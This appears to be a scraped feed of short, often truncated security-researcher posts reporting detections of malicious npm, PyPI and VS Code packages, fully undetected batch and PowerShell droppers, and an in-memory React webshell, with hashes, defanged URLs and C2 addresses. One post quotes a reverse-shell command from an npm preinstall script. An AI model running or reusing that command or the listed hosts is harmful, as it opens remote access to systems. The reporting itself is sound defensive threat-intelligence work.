We analyzed the top 500 most successful THOR rules – “successful” meaning: they detected samples that were either ignored or missed by nearly all AV engines on VirusTotal. Some rules detect clear malware. Others reveal dual-use tools, renamed hacktools, misused admin binaries,

Generic detection rules FTW 🙌 The post-exploitation activity @wiz_io showed yesterday makes these scripts light up like a Christmas tree🎄: bash reverse shells, crypto miner indicators, history resets, wget/curl from http to bare IPs, base64 decoding, etc If you keep your

This pretty much sums up the situation: an in-memory (!) JavaScript-based (!) webshell gets implanted into a vulnerable React server with a single(!) POST request and leaves zero(!) trace in logs or on disk. Someone used that POC, successfully injected the shell and still

It’s wild how little sticks around when someone hits a server with the #React RCE payload. All the interesting parts of the POST request live for a moment in memory, get decoded, executed (or rejected), and vanish. Nothing hits a log, nothing lands on disk. You can scan process

You may not have noticed and I didn’t even want to bother people with it earlier today, but I pushed a set of YARA rules that pick up memory traces from the published RSC exploitation chains. If someone hit your exposed React/Next.js instance with one of the public PoCs, these

We’ve been digging through the #React RCE mess for two days now, trying to get at least some visibility into what’s going on out there. None of this is easy to detect, and most signals vanish in memory before you can even look at them. My teammate @_swachchhanda_ put together a

'payload_1.ps1' looks like #NetSupport @abuse_ch https://t.co/E663Nqk6TB URL's (Russia): hxxp://80.64.19(.)114/fakeurl.htm hxxp://80.64.19(.)114:443/fakeurl.htm 3 AV and 8 Thor comments @nextronresearch

FUD 'kryo_crypted_0ow5ljsy.bat' @abuse_ch https://t.co/siJgg2NLkg FUD with 2 @nextronresearch comments @skocherhan

We @nextronresearch scan many public repos like npm, pypi, vscode marketplace etc. And we find a lot of shitty malware :) Example: https://t.co/YwUVVxUXiG SHA256: 79cc98d0831e7b6a191000ec997ebc1853b1f6cc1190dbb855b97d7bf418c287 #PyPi

Malicious NPM package imitating expressjs/multer. It downloads payload from Google Firebase Storage. https://t.co/406XOvSoeY SHA-256: 3d3ebabe63cc6128194440210bffbafeac95c9a23bf294711a8637aa857b3648 #NPM #Google @nextronresearch

'kryo_crypted_fgow4o24.bat' @abuse_ch https://t.co/irfMnbhI6q 9 AV but 9 thor comments @nextronresearch @skocherhan

FUD 'syn.bat' @abuse_ch https://t.co/DOvNEPtGNF 0 AV and 1 @thor_scanner comment @nextronresearch @skocherhan

Follow-up on yesterday’s VS Code extension case: we finished the malware analysis of the Rust implants Solana-based C2, AES-encrypted JS stages, and a Google Calendar fallback channel with invisible Unicode tricks Write-up is here https://t.co/7ICrh2BEaE by @marius_benthin

We spotted a malicious #VSCode (@code) extension today in our artifact-scanning pipeline. It appeared under a name that tries to pass itself off as the popular Material Icon Theme. A new 5.29.1 version was pushed today (28.11., 11:34) and the update contains two Rust implants –

NPM package "baidu-src-test*" spawning reverse shell on installation via (pre)install script. sh -i >& /dev/tcp/43[.]160[.]194[.]214/53 0>&1 https://t.co/kwAPdFm4GS @nextronresearch #NPM #THOR

FUD 'ihrewq.ps1' seen from Denmark and Russia @abuse_ch https://t.co/3lOSIqDQ6G 3 @nextronresearch comment Original URL: hxxps://62.60.226(.)251/downloads/ihrewq.ps1

The SHA1-Hulud npm mess keeps growing, so we added additional detections for it today - new YARA rules by my colleague @marius_benthin in our public signature-base - cover bun_environment.js / setup_bun.js and the malicious preinstall script variants from the Wiz / Aikido

FUD 'TheUHelper.bat' @abuse_ch https://t.co/vmg8syMEb9 @skocherhan 3 comments from @nextronresearch

In 2024 August this "libmupdf.dll" sample was uploaded to VT from Mexico: ec5d14ca011ba8c12f4d51b0d463cf51051feaf1655c7f709dce3ffa625dfcf6 Today, for some reason, someone rescanned it. And now the sample is detected by ESET as NukeSped (meaning Lazarus). And with the rescan also

FUD 'Cli_____________ent.bat' seen from the UK @abuse_ch https://t.co/TsIsndShmT C2: 208.91.189(.)183:4449 (TCP) Only 1 thor yara hit @nextronresearch